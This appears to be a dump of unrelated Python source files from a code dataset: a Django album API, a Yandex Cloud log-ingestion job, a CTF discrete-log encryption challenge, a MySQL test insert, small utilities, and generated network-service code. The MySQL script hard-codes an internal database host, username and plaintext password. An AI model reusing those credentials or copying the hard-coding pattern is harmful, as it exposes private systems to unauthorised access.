from albums.modules.response_templates.photo import save_template
from albums.serializers import PhotoUploadSerializer, PhotoSerializer, AlbumCreateSerializer, AlbumSerializer, \
SinglePhotoSerializer
class ApiPrivateAlbumCreate(APIView):
    """
    Create a generic album for logged-in user
    post:
        - name: str
        - is_public: bool
    """
    permission_classes = [permissions.IsAuthenticated]
    def post(self, request, *args, **kwargs):
        serializer = AlbumCreateSerializer(data=request.data)
        if serializer.is_valid():
            v = serializer.validated_data
            # Owner is derived from the authenticated user, never from input.
            album_data = {
                'name': v.get('name'),
                'is_public': v.get('is_public'),
                'profile': request.user.base_profile()
            }
            album = Album.objects.create(**album_data)
            response_serializer = AlbumSerializer(album)
            return Response(response_serializer.data, status=status.HTTP_200_OK)
        # Bug fix: was `serializer.errros` (typo), which raised AttributeError
        # on every invalid POST instead of returning the 400 payload.
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ApiPrivateAlbumPostUploadPhoto(APIView):
    """
    Upload a photo to a specified album (via pk)
    ?album=<pk>
    photo: file
    caption: string
    """
    parser_classes = [parsers.MultiPartParser, parsers.FormParser, parsers.JSONParser]
    permission_classes = [permissions.IsAuthenticated]
    def post(self, request, *args, **kwargs):
        # 404 unless the album exists and belongs to the caller's profile.
        album = get_object_or_404(Album, pk=request.GET.get('album', None), profile=request.user.base_profile())
        # Defence in depth: re-check ownership even though the lookup filters by profile.
        if not album.verify_ownership(request.user):
            return Response("Unauthorized access", status=status.HTTP_401_UNAUTHORIZED)
        upload = PhotoUploadSerializer(data=request.data)
        if not upload.is_valid():
            error_body = save_template(
                as_json=False,
                status=status.HTTP_500_INTERNAL_SERVER_ERROR,
                request=request,
                result=upload.errors,
            )
            return Response(error_body, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
        # Persist the photo, attach it to the album, and promote it if needed.
        photo = upload.save()
        photo.album = album
        photo.save()
        photo.set_primary_photo()
        success_body = save_template(
            as_json=False,
            status=status.HTTP_200_OK,
            request=request,
            result=PhotoSerializer(photo).data,
        )
        return Response(success_body, status=status.HTTP_200_OK)
class ApiPrivatePhotoViewSet(UserPassesTestMixin, ModelViewSet):
    """Photo CRUD endpoints; access is gated on ownership of the posted album."""
    parser_classes = [parsers.MultiPartParser, parsers.JSONParser]
    permission_classes = [permissions.IsAuthenticated]
    serializer_class = PhotoSerializer
    def test_func(self):
        # UserPassesTestMixin hook: allow the request only when the album in
        # the POST body belongs to the requesting user's profile.
        try:
            album = Album.objects.get(pk=self.request.POST.get('album'))
        except Album.DoesNotExist:
            # NOTE(review): FileNotFoundError is unusual for an HTTP view —
            # confirm something upstream translates it; a 404 may be intended.
            raise FileNotFoundError
        # Resolve the caller from the "Authorization: Token <key>" header.
        token = self.request.META.get('HTTP_AUTHORIZATION').split(" ")[1]
        user = Account.objects.get(auth_token__key=token)
        if user.base_profile() != album.profile:
            raise PermissionDenied
        return True
996,176 | 7801e8f182c7d2270836007ed69c859169927296 | import base64
import boto3
import botocore
import json
import os
import requests
import time
# Function - Get token
def get_token():
    """Fetch an IAM access token from the instance metadata service."""
    metadata_url = 'http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token'
    reply = requests.get(metadata_url, headers={"Metadata-Flavor":"Google"})
    return reply.json().get('access_token')
# Function - Decrypt data with KMS key
def decrypt_secret_kms(secret):
    """Decrypt a KMS ciphertext via the Yandex KMS REST API and return the plaintext string."""
    bearer = get_token()
    endpoint = 'https://kms.yandex/kms/v1/keys/' + kms_key_id + ':decrypt'
    payload = json.dumps({'ciphertext': secret})
    reply = requests.post(endpoint, data=payload, headers={"Accept":"application/json", "Authorization": "Bearer "+bearer})
    # The API returns the plaintext base64-encoded.
    return base64.b64decode(reply.json().get('plaintext')).decode()
# Configuration - Get ElasticSearch CA.pem
def get_elastic_cert():
    """Return the path of the cluster CA certificate, downloading it on first use."""
    file = '/app/include/CA.pem'
    if os.path.isfile(file):
        return file
    reply = requests.get('https://storage.yandexcloud.net/cloud-certs/CA.pem')
    with open('/app/include/CA.pem', 'wb') as cert_file:
        cert_file.write(reply.content)
    return file
# Configuration - Keys (all secrets arrive KMS-encrypted via environment)
elastic_auth_pw_encr = os.environ['ELK_PASS_ENCR']
kms_key_id = os.environ['KMS_KEY_ID']
s3_key_encr = os.environ['S3_KEY_ENCR']
s3_secret_encr = os.environ['S3_SECRET_ENCR']
# Configuration - Setting up variables for ElasticSearch
elastic_auth_pw = decrypt_secret_kms(elastic_auth_pw_encr)
elastic_auth_user = os.environ['ELASTIC_AUTH_USER']
elastic_server = os.environ['ELASTIC_SERVER']
kibana_server = os.environ['KIBANA_SERVER']
elastic_cert = get_elastic_cert()
# Configuration - Setting up variables for S3
s3_bucket = os.environ['S3_BUCKET']
s3_key = decrypt_secret_kms(s3_key_encr)
s3_local = '/tmp/data'
s3_secret = decrypt_secret_kms(s3_secret_encr)
# Configuration - Sleep time (seconds between ingest passes; default 240)
sleep_time = int(os.environ['SLEEP_TIME']) if os.getenv('SLEEP_TIME') is not None else 240
# Configuration - Log type.
# The three prefix branches were triplicated; the derived index names follow
# one scheme, so compute them once from the first matching prefix variable.
# As before, when no prefix variable is set, s3_folder/elastic_index_* stay
# undefined and later references raise NameError.
for _prefix_var, _alias in (
        ('AUDIT_LOG_PREFIX', 'k8s-audit'),
        ('FALCO_LOG_PREFIX', 'k8s-falco'),
        ('KYVERNO_LOG_PREFIX', 'k8s-kyverno')):
    if os.getenv(_prefix_var) is not None:
        s3_folder = os.environ[_prefix_var].rstrip("/")
        elastic_index_alias = _alias
        elastic_index_name = f"{elastic_index_alias}-index-000001"
        elastic_index_template = f"{elastic_index_alias}-template"
        elastic_index_ilm = f"{elastic_index_alias}-ilm"
        elastic_index_pipeline = f"{elastic_index_alias}-pipeline"
        break
# State - Setting up S3 client (Yandex Object Storage, S3-compatible endpoint)
s3 = boto3.resource('s3',
    endpoint_url = 'https://storage.yandexcloud.net',
    aws_access_key_id = s3_key,
    aws_secret_access_key = s3_secret
)
# SQS-compatible client for Yandex Message Queue; reuses the same static keys.
sqs = boto3.client(
    service_name = 'sqs',
    endpoint_url = 'https://message-queue.api.cloud.yandex.net',
    region_name = 'ru-central1',
    aws_access_key_id = s3_key,
    aws_secret_access_key = s3_secret
)
# Configuration - YMQ (queue delivering S3 object-created notifications)
sqs_url = os.environ['YMQ_URL']
# Function - Create config index in ElasticSearch
def create_config_index():
    """Create the hidden .state-<alias> marker index if absent (idempotent)."""
    # Probe whether the marker index already exists.
    request_suffix = f"/.state-{elastic_index_alias}"
    response = requests.get(elastic_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
    if(response.status_code == 404):
        # Missing: create it with one document flagging this log type as configured.
        request_suffix = f"/.state-{elastic_index_alias}/_doc/1"
        request_json = """{
            "is_configured": true
        }"""
        response = requests.post(elastic_server+request_suffix, data=request_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
        print('Config index -- CREATED')
        print(f"{response.status_code} -- {response.text}")
    else:
        print('Config index -- EXISTS')
        print(f"{response.status_code} -- {response.text}")
# Function - Get config index state
def get_config_index_state():
    """Return True when the marker document says this log type is configured."""
    doc_url = elastic_server + f"/.state-{elastic_index_alias}/_doc/1/_source"
    reply = requests.get(doc_url, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
    # Any non-200 (index or doc missing) means "not configured yet".
    return reply.json()['is_configured'] if reply.status_code == 200 else False
# Function - Create ingest pipeline
def create_ingest_pipeline():
    """Register the ingest pipeline for this log type from the bundled JSON file."""
    request_suffix = f"/_ingest/pipeline/{elastic_index_pipeline}"
    # TODO: replace with a direct GitHub link once the repo becomes public
    # (translated from the original Russian note).
    # `with` fixes the original's file handle leak on json.load failure.
    with open(f"/app/include/{elastic_index_alias}/pipeline.json") as data_file:
        data_json = json.load(data_file)
    response = requests.put(elastic_server+request_suffix, json=data_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
    if(response.status_code == 200):
        print('Ingest pipeline -- CREATED')
        print(f"{response.status_code} -- {response.text}")
# Function - Create an index template
def create_index_template():
    """Install the index template for this log type from the bundled JSON file."""
    request_suffix = f"/_index_template/{elastic_index_template}"
    # `with` fixes the original's file handle leak on json.load failure.
    with open(f"/app/include/{elastic_index_alias}/index-template.json") as data_file:
        data_json = json.load(data_file)
    response = requests.put(elastic_server+request_suffix, json=data_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
    if(response.status_code == 200):
        print('Index template -- CREATED')
        print(f"{response.status_code} - {response.text}")
def create_lifecycle_policy():
    """Create the ILM policy: roll the index over at 30 days or 50gb primary shard."""
    request_suffix = f"/_ilm/policy/{elastic_index_ilm}"
    request_json = """{
    "policy": {
        "phases": {
            "hot": {
                "min_age": "0ms",
                "actions": {
                    "rollover": {
                        "max_age": "30d",
                        "max_primary_shard_size": "50gb"
                    }
                }
            }
        }
    }
    }"""
    response = requests.put(elastic_server+request_suffix, data=request_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
    if(response.status_code == 200):
        print('Index lifecycle policy -- CREATED')
        print(f"{response.status_code} - {response.text}")
# Function - Create an index
def create_first_index():
    """Create the initial concrete index (…-index-000001) behind the alias."""
    index_url = elastic_server + f"/{elastic_index_name}"
    reply = requests.put(index_url, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
    if reply.status_code == 200:
        print(f"Index {elastic_index_name} -- CREATED")
        print(f"{reply.status_code} - {reply.text}")
# Function - Create an index alias
def create_index_alias():
    """Point the log-type alias at the first concrete index."""
    request_suffix = f"/_aliases"
    # %-interpolation (not an f-string) because the JSON body contains literal braces.
    request_json = """{
    "actions" : [
        { "add" : { "index" : "%s", "alias" : "%s" } }
    ]
    }""" % (elastic_index_name, elastic_index_alias)
    response = requests.post(elastic_server+request_suffix, data=request_json, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"Content-Type":"application/json"})
    if(response.status_code == 200):
        print('Index alias -- CREATED')
        print(f"{response.status_code} - {response.text}")
# Function - Refresh index
def refresh_index():
    """Force a refresh so freshly bulk-indexed documents become searchable."""
    refresh_url = elastic_server + f"/{elastic_index_alias}/_refresh"
    reply = requests.post(refresh_url, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw))
    if reply.status_code == 200:
        print('Index -- REFRESHED')
        print(f"{reply.status_code} -- {reply.text}")
# Function - Check detection engine index
def get_detections_engine():
    """Return True when the Kibana SIEM detection-engine index already exists."""
    reply = requests.get(kibana_server + f"/s/default/api/detection_engine/index", verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
    if reply.status_code == 200:
        return True
    print(f"{reply.status_code} - {reply.text}")
    return False
# Function - Preconfigure Kibana
def _import_kibana_file(filename, request_suffix, label):
    """Upload one bundled ndjson file to a Kibana import endpoint.

    Silently skips files not bundled for this log type; on HTTP 200 prints the
    label plus the raw response, matching the original trace format. `with`
    also fixes the original's unclosed file handles.
    """
    file = f"/app/include/{elastic_index_alias}/{filename}"
    if os.path.isfile(file):
        with open(file, 'rb') as fh:
            data_file = {
                'file': fh
            }
            response = requests.post(kibana_server+request_suffix, files=data_file, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
        if(response.status_code == 200):
            print(f'{label} -- IMPORTED')
            print(f"{response.status_code} -- {response.text}")
# Function - Preconfigure Kibana
def configure_kibana():
    """Import saved objects and SIEM detection rules for this log type.

    The original repeated the same upload stanza for every file; the shared
    logic now lives in _import_kibana_file.
    """
    _import_kibana_file('index-pattern.ndjson', '/api/saved_objects/_import', 'Index pattern')
    _import_kibana_file('filters.ndjson', '/api/saved_objects/_import', 'Filters')
    _import_kibana_file('search.ndjson', '/api/saved_objects/_import', 'Searches')
    _import_kibana_file('dashboard.ndjson', '/api/saved_objects/_import', 'Dashboard')
    # Detections: the SIEM signals index must exist before rules are imported.
    if not get_detections_engine():
        request_suffix = '/s/default/api/detection_engine/index'
        response = requests.post(kibana_server+request_suffix, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), headers={"kbn-xsrf":"true"})
        if(response.status_code == 200):
            print('Detections -- SIEM rules index pre-created')
            print(f"{response.status_code} - {response.text}")
    _import_kibana_file('detections.ndjson', '/api/detection_engine/rules/_import', 'Detections')
# Function - Clean up S3 folder
def delete_object_s3(s3_bucket, s3_object):
    """Delete a single object from the given S3 bucket."""
    delete_spec = {'Objects': [{'Key': s3_object}]}
    s3.Bucket(s3_bucket).delete_objects(Delete=delete_spec)
# Function - Delete SQS message
def delete_sqs_message(msg):
    """Acknowledge (delete) one received queue message by its receipt handle."""
    receipt = msg.get('ReceiptHandle')
    sqs.delete_message(QueueUrl=sqs_url, ReceiptHandle=receipt)
# Function - Process JSON logs batch
def process_s3_batch(bucket, folder, local=None):
    """Drain the queue: download each referenced S3 JSON log, enrich every line
    with cluster metadata, and bulk-index it into Elasticsearch.

    bucket -- S3 bucket to download objects from
    folder -- unused here; kept for call-site compatibility (object keys arrive in messages)
    local  -- optional local staging directory for downloads
    """
    print('JSON processing -- STARTED')
    # Fragment injected by the log shipper that must be stripped before indexing.
    parse_substring = '".": {}, '
    processing = True
    request_suffix = f"/{elastic_index_alias}/_bulk?pipeline={elastic_index_pipeline}"
    while processing:
        b = s3.Bucket(bucket)
        # Long-poll up to 10 notifications; an empty poll ends the drain loop.
        messages = sqs.receive_message(
            QueueUrl=sqs_url,
            MaxNumberOfMessages=10,
            VisibilityTimeout=60,
            WaitTimeSeconds=20
        ).get('Messages')
        if messages is None:
            processing = False
            continue
        for msg in messages:
            msg_body = json.loads(msg.get('Body'))
            source = msg_body['object_id']
            cloud_id = msg_body['cloud_id']
            folder_id = msg_body['folder_id']
            cluster_id = msg_body['cluster_id']
            cluster_url = msg_body['cluster_url']
            # Keys ending in '/' are folder markers: nothing to ingest.
            if source[-1] == '/':
                delete_sqs_message(msg)
                continue
            target = source if local is None \
                else os.path.join(local, source)
            if not os.path.exists(os.path.dirname(target)):
                os.makedirs(os.path.dirname(target))
            try:
                b.download_file(source, target)
            except botocore.exceptions.ClientError as e:
                # Download failed (e.g. object already removed): drop the
                # message and move on. Consistency fix: was an inline
                # sqs.delete_message duplicating the delete_sqs_message helper.
                delete_sqs_message(msg)
                continue
            with open(target, "r") as raw_file:
                lines = []
                for line in raw_file:
                    # Bulk body: an action line, then the metadata-enriched document.
                    # NOTE(review): every line except the last keeps a trailing
                    # comma (stripped below only for the final line) — the
                    # ingest pipeline apparently tolerates this; confirm.
                    lines.append('{"index":{}},')
                    line = line.replace(parse_substring, "")
                    lines.append(f"{line.rstrip()[:-1]}, \"cloud_id\": \"{cloud_id}\", \"folder_id\": \"{folder_id}\", \"cluster_id\": \"{cluster_id}\", \"cluster_url\": \"{cluster_url}\"}},")
                lines[-1] = lines[-1][:-1]+"\n"
                data = "\n".join(lines)
                response = requests.post(elastic_server+request_suffix, \
                    data=data, verify=elastic_cert, auth=(elastic_auth_user, elastic_auth_pw), \
                    headers={"Content-Type":"application/json"})
                if(response.status_code == 200):
                    # Indexed: remove the object, its queue message and the staged copy.
                    delete_object_s3(s3_bucket, source)
                    delete_sqs_message(msg)
                    os.remove(target)
                    print(response.text)
                else:
                    print(response.text)
    print(f"JSON processing -- COMPLETE")
# Process - Upload data
def upload_logs():
    """One ingest pass: bootstrap Elasticsearch/Kibana on first run, then process pending batches."""
    if(get_config_index_state()):
        print("Config index -- EXISTS")
    else:
        # First run for this log type: create ILM policy, template, index,
        # alias, ingest pipeline and Kibana objects, then mark as configured.
        create_lifecycle_policy()
        create_index_template()
        create_first_index()
        create_index_alias()
        create_ingest_pipeline()
        configure_kibana()
        create_config_index()
    # Common tail (was duplicated verbatim in both branches).
    process_s3_batch(s3_bucket, s3_folder, s3_local)
    refresh_index()
### MAIN CONTROL PANEL
# Single ingest pass, then pause; presumably the container runtime restarts
# the process to form the polling loop — confirm against the deployment spec.
upload_logs()
print("Sleep -- STARTED")
time.sleep(sleep_time)
996,177 | d5cab69de54048e40940ed232e10222a54e3a1a9 | from secret import flag, key
f = open('ciphertext.txt', 'w')
p = 1044388881413152506679602719846529545831269060992135009022588756444338172022322690710444046669809783930111585737890362691860127079270495454517218673016928427459146001866885779762982229321192368303346235204368051010309155674155697460347176946394076535157284994895284821633700921811716738972451834979455897010306333468590751358365138782250372269117968985194322444535687415522007151638638141456178420621277822674995027990278673458629544391736919766299005511505446177668154446234882665961680796576903199116089347634947187778906528008004756692571666922964122566174582776707332452371001272163776841229318324903125740713574141005124561965913888899753461735347970011693256316751660678950830027510255804846105583465055446615090444309583050775808509297040039680057435342253926566240898195863631588888936364129920059308455669454034010391478238784189888594672336242763795138176353222845524644040094258962433613354036104643881925238489224010194193088911666165584229424668165441688927790460608264864204237717002054744337988941974661214699689706521543006262604535890998125752275942608772174376107314217749233048217904944409836238235772306749874396760463376480215133461333478395682746608242585133953883882226786118030184028136755970045385534758453247
g = 5
A = 1026312539297800437474663698165859314949881437729617621666434357798219198741950468733395500361477359726152747087790103309627020498122003777642051150130697457594304849673838709900017711265818285080832347734747895550397950729716624922572654209637755195129162139245110756558638081495998280747642920484467428206475906559638681536868548289456924005274209311355030582255692087426910634838198143851507435754029135363794578075936092774722678311786272841489629294721103591751528609388061794369341067986401129462942050916582521451289187645626081017578576190303952351748434876686541368607656026867091583868645619423975306245327421218767449273192101105293424028461698783545171866070124432565063559495566733441286372612161876492134408160732339966921175762866198980795890946054558528891296203285979664329713156129091098226212735763844909789916934266711879564086741733061623347281499025678164709559814150194881622611023214199434022258730549350019749882889143749385314934896284396513061241138504029046053964944026179039768718830854958634216721133676746317913559932277050177463811150719675119168868527853864167729206220819613297736800799391257602899169041109002518019207734013899840092155297682096290489330476118066934735827328128343402508975429994312
d = key
m = int(flag.encode('hex'), 16) % p
B = pow(g, d, p)
k = pow(A, d, p)
c = k * m % p
f.write(str(B) + '\n')
f.write(str(c) + '\n')
f.close()
|
996,178 | 7f832976a6a837ea754024c0d6da1966c4120e43 | """Take header file and runcc file and make the job files"""
import os, sys
head = sys.argv[1]   # header file: copied verbatim to the top of each job script
job = sys.argv[2]    # command file: one command line per generated job
with open(head) as h:
    header = h.readlines()
n = 0
with open(job) as j:
    for line in j:
        out_name = 'job' + str(n) + '.sh'
        # Context manager fixes the original's leaked handles (open() with no
        # close()); writelines also removes the `h` loop variable that
        # shadowed the file handle above.
        with open(out_name, 'w') as out:
            out.writelines(header)
            out.write(line)
        n += 1
996,179 | 3795030922832334defa0b242fbd602bb65c49c1 | import os, sys
BASE_DIR = os.getcwd()
sys.path.append(BASE_DIR)  # make the project-local app_porcess package importable
from app_porcess.dbUtls import MysqlPool
import json
import time
if __name__ == '__main__':
    # SECURITY NOTE(review): database host/credentials are hard-coded here;
    # they should come from configuration or the environment.
    pool = MysqlPool(host="10.144.15.187", port=3815, username='spider', passwd='QAZwsxEDC', db='spider')
    jstr = '{"test":1}'
    # NOTE(review): jobj is never used; also dumps a str (double-encoding) — confirm intent.
    jobj = json.dumps(jstr, ensure_ascii=False)
    item = dict(display_url="1", large_image_list_url="2", title="3", source="4")
    # Parameterized insert: %s placeholders are filled by the driver, not string-formatted.
    sql = 'insert into android_toutiao_app(meta_data, display_url, large_image_list, title, `source`, create_time) value (%s,%s,%s,%s,%s, %s);'
    data_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
    args = (jstr, item.get('display_url'), item.get('large_image_list_url'), item.get('title'), item.get('source'), data_time)
    pool.insert(sql, args)
996,180 | b023b76b8a8fabca315b91a249254236b8c29a9c | import bottle
import json
import os
from client import Robot, get_commands, write_read
class Controller(object):
    """Thin HTTP facade exposing a Robot's commands via bottle routes.

    Routes are registered as a side effect of construction.
    """
    def __init__(self, robot, path=os.getcwd()):
        # NOTE(review): default evaluated once at import time — os.getcwd() is
        # frozen to the importing process's cwd.
        self.robot = robot
        self.bottle = bottle
        self.commands = self.robot.commands
        # Bug fix: the handlers below were declared with a `self` parameter,
        # but bottle invokes route callbacks with URL parameters only, so every
        # request raised TypeError. They are plain closures over `self`/`path`.
        @self.bottle.route('/command_tree')
        def command_tree():
            return json.dumps(self.commands)
        @self.bottle.route('/run/<command>/')
        def run(command):
            return json.dumps({"response"
                : write_read(self.commands[command])})
        @self.bottle.route('/style.css')
        def style():
            return bottle.static_file('/style.css', root=path)
        @self.bottle.route('/')
        def controller():
            # NOTE(review): stop maps to robot.do, same as do — confirm intended.
            return bottle.template('controller',
                do = self.robot.do,
                question = self.robot.question,
                info = self.robot.info,
                stop = self.robot.do)
if __name__ == "__main__":
    # Build a robot from the discovered commands and serve the control UI.
    my_bot = Robot(get_commands())
    my_controller = Controller(my_bot)  # registers the bottle routes as a side effect
    bottle.run(host="localhost", port="8000")
|
996,181 | 030dddf4c921e4acf888a31d7373a8e1cf217696 | from artifacts.models import Artifact
from data_info import *
try:
    # Insert each item from data_info unless an identical artifact already
    # exists (matched on title + price + description). Python 2 syntax.
    for i in items:
        try:
            temp_art = Artifact.objects.get(title=i.title, price=i.price, description=i.description)
        except Artifact.DoesNotExist:
            print "Adding " + i.title + " to database"
            i.save()
except:
    # Catch-all: report and re-raise so the failure still surfaces to the caller.
    print ":("
    ##if only it could be somebody else's problem...
    raise
996,182 | 0bc665ff8d792a9622f71dcfca0afd8c4c4bd18c | import argparse
import json
import matplotlib
matplotlib.use('Agg')
import matplotlib.pylab as plt
import seaborn as sns
import pandas as pd
# Plot accuracy vs. fraction of training data removed, per model and removal
# strategy, from a JSON results file.
parser = argparse.ArgumentParser()
parser.add_argument('--json-result')
args = parser.parse_args()
results = json.load(open(args.json_result))
tab_results = []
for r in results:
    # Only the four BERT/RoBERTa variants are plotted.
    if not r['model'] in ('BERT', 'ROBERTA', 'BERTL', 'ROBERTAL'):
        continue
    # Map internal model codes to display names.
    model_names = {
        'BERT': 'BERT-base',
        'ROBERTA': 'RoBERTa-base',
        'BERTL': 'BERT-large',
        'ROBERTAL': 'RoBERTa-large',
    }
    r['model'] = model_names[r['model']]
    if r['rm_overlap'] > 0:
        r['removed_fraction'] = r['rm_overlap'] * 100  # fraction -> percent
        r['strategy'] = 'overlap'
        tab_results.append(r)
    elif r['rm_random'] > 0:
        r['removed_fraction'] = r['rm_random'] * 100
        r['strategy'] = 'random'
        tab_results.append(r)
    else:
        # Baseline (nothing removed): duplicate the row under both strategies
        # so each curve has a 0% point.
        r['removed_fraction'] = 0
        r['strategy'] = 'overlap'
        tab_results.append(r)
        r = dict(r)
        r['strategy'] = 'random'
        tab_results.append(r)
df = pd.DataFrame(data=tab_results)
sns.set(style="whitegrid")
sns.set(font_scale=1.7)
g = sns.catplot(data=df, x='removed_fraction', y='acc', hue='strategy', col='model', kind='point')
g.set_axis_labels('% training data removed', 'accuracy (%)')
g.savefig('remove.pdf')
996,183 | 31192e7cdbfcd51cf38e3c7e5656041e8e4f8155 | version https://git-lfs.github.com/spec/v1
oid sha256:5314b6d0e1f855390d3aa87682038d21b2343d5010df8c367d7c707a8c7fa3cf
size 10210
|
996,184 | 961cd4781cbd4c35f1c9354f6a57eb2e0ab28d7c | #
# This computer program is the confidential information and proprietary trade
# secret of Anuta Networks, Inc. Possessions and use of this program must
# conform strictly to the license agreement between the user and
# Anuta Networks, Inc., and receipt or possession does not convey any rights
# to divulge, reproduce, or allow others to use this program without specific
# written authorization of Anuta Networks, Inc.
#
# Copyright (c) 2016-2017 Anuta Networks, Inc. All Rights Reserved.
#
#
#ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE
#
"""
Tree Structure of Handled XPATH:
services
|
managed-cpe-services
|
customer
|
eem-applets
|
event-manager-applet
|
actions
|
action
Schema Representation:
/services/managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action
"""
"""
Names of Leafs for this Yang Entity
label maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/label
action-statement maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/action-statement
cli-type maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/cli-type
cli-string maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/cli-string
regex-pattern maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/regex-pattern
input-string maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/input-string
syslog-priority maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/syslog-priority
syslog-msg maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/syslog-msg
first-operand maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/first-operand
compare maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/compare
second-operand maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/second-operand
exit-result maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/exit-result
comment-string maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/comment-string
handle-error-type maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/handle-error-type
"""
from servicemodel import util
from servicemodel import yang
from servicemodel import devicemgr
from cpedeployment.cpedeployment_lib import getLocalObject
from cpedeployment.cpedeployment_lib import getDeviceObject
from cpedeployment.cpedeployment_lib import getCurrentObjectConfig
from cpedeployment.cpedeployment_lib import getPreviousObjectConfig
from cpedeployment.cpedeployment_lib import ServiceModelContext
from cpedeployment.cpedeployment_lib import getParentObject
from cpedeployment.cpedeployment_lib import log
class ServiceDataCustomization:
    @staticmethod
    def process_service_create_data(smodelctx, sdata, dev, **kwargs):
        """Hook called on service create, before device bindings are computed,
        so integrators can rewrite the raw inputs."""
        modify = True
        if modify and kwargs is not None:
            # Trace every callback argument for debugging.
            for key, value in kwargs.items():
                log("%s == %s" %(key,value))
        if modify:
            # Currently unused placeholders showing where input rewriting would go.
            config = kwargs['config']
            inputdict = kwargs['inputdict']
            inputkeydict = kwargs['inputkeydict']
    @staticmethod
    def process_service_device_bindings(smodelctx, sdata, dev, **kwargs):
        """Hook called to adjust device bindings and push the EEM applet action
        config to the bound device(s)."""
        modify = True
        if modify and kwargs is not None:
            # Trace every callback argument for debugging.
            for key, value in kwargs.items():
                log("%s == %s" %(key,value))
        if modify:
            # Currently unused placeholders exposing the callback payload.
            config = kwargs['config']
            inputdict = kwargs['inputdict']
            inputkeydict = kwargs['inputkeydict']
            devbindobjs = kwargs['devbindobjs']
            id = kwargs['id']
            opaque_args = kwargs['hopaque']
        # Delegate shared create logic to the grouping customization module.
        import cpedeployment.cpedeployment_grouping_lib.eem_applet_customization
        cpedeployment.cpedeployment_grouping_lib.eem_applet_customization.grouping_create_eem_applet_event_manager_applet_actions_action(smodelctx, sdata, dev, xpath='managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action', **kwargs)
        # Nothing to push when no device is bound.
        if dev is None or (isinstance(dev, list) and len(dev) == 0):
            return
        # Resolve the parent applet name and inject it into the input dict.
        _event_manager_applet_obj = getLocalObject(sdata, 'event-manager-applet')
        inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'] = _event_manager_applet_obj.event_manager_applet.applet_name
        from servicemodel.device_abs_lib import device_eem_applets
        # Create the action on the device only when both keys are present.
        if inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'] is not None and inputdict['label'] is not None:
            device_eem_applets.eem_applets.event_manager_applet.actions.action().create(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], fill_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, sdata=sdata), addref=True)
@staticmethod
def process_service_update_data(smodelctx, sdata, **kwargs):
    """callback called for update operation"""
    # NOTE(review): generated callback; `modify` is a hardcoded enable switch.
    modify = True
    if modify and kwargs is not None:
        # Trace every callback argument for debugging.
        for key, value in kwargs.items():
            log("%s == %s" %(key,value))
    if modify:
        config = kwargs['config']
        inputdict = kwargs['inputdict']
        id = kwargs['id']
        opaque_args = kwargs['hopaque']
        #Previous config and previous inputdict
        pconfig = kwargs['pconfig']
        pinputdict = kwargs['pinputdict']
        dev = kwargs['dev']
        # Run the hand-written customization hook for this xpath first.
        import cpedeployment.cpedeployment_grouping_lib.eem_applet_customization
        cpedeployment.cpedeployment_grouping_lib.eem_applet_customization.grouping_update_eem_applet_event_manager_applet_actions_action(smodelctx, sdata, xpath='managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action', **kwargs)
        if dev is None or (isinstance(dev, list) and len(dev) == 0):
            return
        _event_manager_applet_obj = getLocalObject(sdata, 'event-manager-applet')
        inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'] = _event_manager_applet_obj.event_manager_applet.applet_name
        from servicemodel.device_abs_lib import device_eem_applets
        # Classify how the list key changed ([payload, schema] pair), then
        # apply delete/create/update on the device accordingly.
        up_map_devices_device_eem_applets_event_manager_applet_actions_action = fill_up_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, pinputdict, sdata=sdata)
        if up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-delete-create' or up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-delete':
            # Key changed or was cleared: remove the old entry (built from
            # the previous inputdict) before any re-create.
            device_eem_applets.eem_applets.event_manager_applet.actions.action().delete(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], fill_map_devices_device_eem_applets_event_manager_applet_actions_action(pinputdict), remove_reference=True)
